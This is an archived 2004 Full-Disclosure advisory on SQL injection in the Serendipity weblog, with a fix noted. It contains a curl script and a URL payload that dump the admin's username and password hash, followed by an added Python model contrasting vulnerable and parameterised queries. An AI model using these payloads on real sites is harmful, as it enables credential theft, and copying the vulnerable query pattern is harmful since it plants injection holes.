[Full-Disclosure] Serendipity 0.7-beta1 SQL Injection PoC

From: aCiDBiTS (acidbits_at_gmail.com)
Date: 09/28/04

    To: full-disclosure@lists.netsys.com
    Date: Tue, 28 Sep 2004 13:28:38 +0200
    
    

    Serendipity 0.7-beta1 SQL Injection Proof of Concept
    By aCiDBiTS acidbits@gmail.com 13-September-2004

            
    "Serendipity (http://www.s9y.org/) is a weblog/blog system,
    implemented with PHP. It is standards compliant, feature rich and open
    source (BSD License)."
            
    The entry_id parameter is used in SQL queries in exit.php and
    comment.php without any input sanitization. This can be exploited
    to manipulate those queries by injecting arbitrary SQL code. comment.php
    is also prone to XSS through the email and username POST fields.
    Serendipity 0.7-beta1 and older versions are vulnerable.

    The developer team was notified on 13-September-2004, and these
    vulnerabilities are fixed as of Serendipity 0.7-beta3.
            
    These PoCs dump the admin's username and md5(password).

    Proof of Concept 1
    ------------------

    Usage: ./ser_sqli_poc.sh URL_to_Serendipity_Weblog

    ser_sqli_poc.sh
    ---------8<-----------8<-------------
    #!/bin/sh
    # Usage: ./ser_sqli_poc.sh URL_to_Serendipity_Weblog
    # exit.php puts the first column of the UNION result into its Location:
    # header, so a HEAD request (-I) is enough. cut -b10- strips the
    # "Location: " prefix and tr drops the CR that ends the header line.
    # printf is used instead of "echo -n", which not every /bin/sh supports.

    printf 'Username: '
    curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20username%20from%20serendipity_authors%20where%20authorid%3D1" \
        | grep Location | cut -b10- | tr -d '\r'
    printf 'MD5(password): '
    curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20password%20from%20serendipity_authors%20where%20authorid%3D1" \
        | grep Location | cut -b10- | tr -d '\r'
    ---------8<-----------8<-------------

    Proof of Concept 2
    ------------------

    Copy and paste this into your browser, replacing URL_to_Serendipity_Weblog.
    The 13 values in the injected SELECT match the column count of the query
    comment.php runs for trackbacks, so the UNION is accepted, and the
    trailing /* comments out whatever follows entry_id in that query.

    http://URL_to_Serendipity_Weblog/comment.php?serendipity[type]=trackbacks&serendipity[entry_id]=0%20and%200%20union%20select%201,2,3,4,username,password,7,8,9,0,1,2,3%20from%20serendipity_authors%20where%20authorid=1%20/*
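    How the PoCs above get the admin's credentials out through exit.php, as an
    added example that is not code from this advisory or from Serendipity: a
    Python model of the exit.php lookup, written once the vulnerable way (the
    decoded GET values pasted straight into the SQL string) and once the
    hardened way (integer-checked, bound parameters), both driven by the exact
    query strings from PoC 1 against a constructed in-memory SQLite database.
    The names serendipity_authors, username, password and authorid are taken
    from the PoC URLs; the serendipity_references table, its columns, the query
    shape, the sample rows and the helper names are assumptions made here for
    illustration.

```python
# Added example, not Serendipity's own code: a model of the exit.php lookup the
# advisory describes, in its vulnerable form (GET parameters interpolated into
# the SQL text) and a hardened form (integer-checked, bound parameters), driven
# by the query strings from PoC 1.
#
# serendipity_authors / username / password / authorid come from the PoC URLs.
# The serendipity_references table, its columns, the query shape and the sample
# rows are constructed here for illustration and are not the real schema.
import hashlib
import sqlite3
from urllib.parse import parse_qs

ADMIN_USER = "admin"                                  # constructed sample data
ADMIN_PASS_MD5 = hashlib.md5(b"s3cret").hexdigest()   # the advisory says md5(password) is stored
LEGIT_LINK = "http://example.org/linked-from-entry-1"

# Query strings lifted from PoC 1 in the advisory, percent-encoded as sent.
POC_USERNAME = ("url_id=1&entry_id=1%20and%200%20union%20select%20username"
                "%20from%20serendipity_authors%20where%20authorid%3D1")
POC_PASSWORD = POC_USERNAME.replace("username", "password")


def make_db():
    """In-memory stand-in for the weblog database: one admin, one outbound link."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE serendipity_authors(authorid INTEGER, username TEXT, password TEXT);
        CREATE TABLE serendipity_references(id INTEGER, entry_id INTEGER, link TEXT);
    """)
    db.execute("INSERT INTO serendipity_authors VALUES (1, ?, ?)",
               (ADMIN_USER, ADMIN_PASS_MD5))
    db.execute("INSERT INTO serendipity_references VALUES (1, 1, ?)", (LEGIT_LINK,))
    return db


def exit_vulnerable(db, url_id, entry_id):
    """Vulnerable pattern: raw request values interpolated into the SQL text.

    With PoC 1 the WHERE clause becomes
      id = 1 AND entry_id = 1 and 0 union select username from ... where authorid=1
    so the original SELECT matches no row and the UNION supplies the admin's
    username as the "link" that exit.php then redirects to.
    """
    sql = ("SELECT link FROM serendipity_references "
           f"WHERE id = {url_id} AND entry_id = {entry_id}")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def exit_fixed(db, url_id, entry_id):
    """Hardened form: reject anything that is not an integer, then bind it."""
    try:
        uid, eid = int(url_id), int(entry_id)
    except ValueError:
        return None   # PHP's (int) cast would instead truncate "1 and 0 ..." to 1
    row = db.execute(
        "SELECT link FROM serendipity_references WHERE id = ? AND entry_id = ?",
        (uid, eid)).fetchone()
    return row[0] if row else None


def location_header(link):
    """The redirect exit.php sends; `curl -I | grep Location | cut -b10-` reads it."""
    return None if link is None else f"Location: {link}\r\n"


def run_exit(db, query_string, handler):
    """Decode the GET query string as the web server would, then run the handler."""
    params = parse_qs(query_string)
    return location_header(handler(db, params["url_id"][0], params["entry_id"][0]))


if __name__ == "__main__":
    db = make_db()
    for name, qs in (("username", POC_USERNAME), ("password", POC_PASSWORD)):
        print(f"{name:8s} vulnerable: {run_exit(db, qs, exit_vulnerable)!r}")
        print(f"{name:8s} fixed:      {run_exit(db, qs, exit_fixed)!r}")
    print(f"legit    fixed:      {run_exit(db, 'url_id=1&entry_id=1', exit_fixed)!r}")
```

    Run it directly to see the Location: header each variant would emit for the
    two PoC 1 payloads and for a legitimate request. PoC 2 relies on the same
    mechanism against comment.php; it differs only in the number of columns the
    UNION has to supply and in the /* that comments out the tail of that query.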

         \ /
          (Oo)
         //||\\

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

